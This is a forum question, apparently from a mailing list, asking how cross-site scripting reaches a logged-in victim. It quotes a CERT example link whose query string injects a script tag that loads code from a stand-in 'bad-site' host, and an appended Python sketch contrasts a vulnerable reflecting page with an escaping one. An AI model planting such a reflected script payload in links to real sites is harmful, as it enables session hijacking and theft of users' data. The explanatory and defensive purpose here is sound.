There have been quite a few alerts on cross scripting and I'm somewhat confused on the issue. Assuming the offending script is coming from an offending site (not an e-mail with script code appended to the victim URL) and the victim site is a site where sensitive transactions can only be initiated after a valid login, what's going on?
Is it a situation where the victim is logged into the legit site and, while the session is open, opens another session (through another browser window) with the bad guy's site, and the bad guy's site has a link to the legit site with the offending script appended? If there are two separate windows, how does the offending code get passed to the victim site? The example below is from the CERT site, but I'm not 100 percent sure what they are talking about.

<A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>

Mike
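An added example (not from the original post or from the CERT advisory) modelling the comment.cgi page from that link in Python: the script is not passed between windows at all; when the victim follows the link, the legit site's own response reflects the mycomment parameter back unencoded, so the browser runs it as example.com code, and the hardened version escapes the parameter before reflecting it. The URL, function names and page markup are constructed for illustration.

```python
# Added example: a minimal model of the "comment.cgi?mycomment=..." page from
# the quoted CERT link. The vulnerable version reflects the query parameter
# verbatim, so the <SCRIPT SRC='http://bad-site/badfile'> carried in the link
# lands inside example.com's page and executes with that page's origin and
# cookies. The hardened version HTML-escapes the parameter first, so the
# browser shows it as text instead of running it.
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed sample URL with the same shape as the CERT example.
ATTACK_URL = ("http://example.com/comment.cgi?"
              "mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>")


def comment_param(url: str) -> str:
    """Extract the mycomment query parameter the way a CGI script would."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("mycomment", [""])[0]


def render_vulnerable(comment: str) -> str:
    """Reflect the parameter into the page with no encoding (the XSS bug)."""
    return f"<html><body><p>Your comment:</p>{comment}</body></html>"


def render_hardened(comment: str) -> str:
    """Same page, but the parameter is HTML-escaped before it is reflected.
    quote=True also encodes ' and ", so the value is inert in element content
    and inside quoted attributes."""
    safe = escape(comment, quote=True)
    return f"<html><body><p>Your comment:</p>{safe}</body></html>"


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show the difference between the two pages."""
    return "<script" in page.lower()


if __name__ == "__main__":
    c = comment_param(ATTACK_URL)
    print("vulnerable page carries a script tag:", contains_script_tag(render_vulnerable(c)))
    print("hardened page carries a script tag:  ", contains_script_tag(render_hardened(c)))
```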